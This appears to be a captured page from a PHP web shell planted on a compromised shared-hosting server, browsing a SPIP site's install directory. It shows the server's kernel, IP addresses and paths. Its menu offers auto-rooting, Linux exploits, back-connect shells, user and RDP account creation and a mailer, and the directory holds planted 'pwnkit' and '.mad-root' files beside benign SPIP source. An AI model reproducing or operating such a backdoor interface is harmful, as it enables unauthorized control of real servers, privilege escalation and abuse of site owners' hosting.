Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
install /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
etape_.php
1.58
KB
-rw----r--
etape_1.php
2.74
KB
-rw----r--
etape_2.php
5.66
KB
-rw----r--
etape_3.php
11.17
KB
-rw----r--
etape_3b.php
6.24
KB
-rw----r--
etape_4.php
2.56
KB
-rw----r--
etape_chmod.php
4.07
KB
-rw----r--
etape_fin.php
2.48
KB
-rw----r--
etape_ldap1.php
2.58
KB
-rw----r--
etape_ldap2.php
3.65
KB
-rw----r--
etape_ldap3.php
2.89
KB
-rw----r--
etape_ldap4.php
3.63
KB
-rw----r--
etape_ldap5.php
4.13
KB
-rw----r--
index.php
2
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : etape_.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Affichage de l'écran d'installation (étape 0 : écran d'accueil) * * @package SPIP\Core\Installation */ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Affiche l'étape 0 d'installation : écran d'accueil. * * @uses info_copyright() **/ function install_etape__dist() { utiliser_langue_visiteur(); $menu_langues = menu_langues('var_lang_ecrire'); if (!$menu_langues) { redirige_url_ecrire('install', 'etape=chmod'); } else { include_spip('inc/presentation'); // pour info_copyright $res = "<div class='petit-centre'><img alt='SPIP' class='logo' src='" . chemin_image('logo-spip.png') . "'>\n" . "<p class='small'>" . info_copyright() . "</p></div>\n" . '<p>' . _T('install_select_langue') . '</p>' . '<div>' . $menu_langues . "</div>\n" . generer_form_ecrire('install', "<input type='hidden' name='etape' value='chmod'>" . bouton_suivant()); $minipage = new Spip\Afficher\Minipage\Installation(); echo $minipage->page($res); } }
Close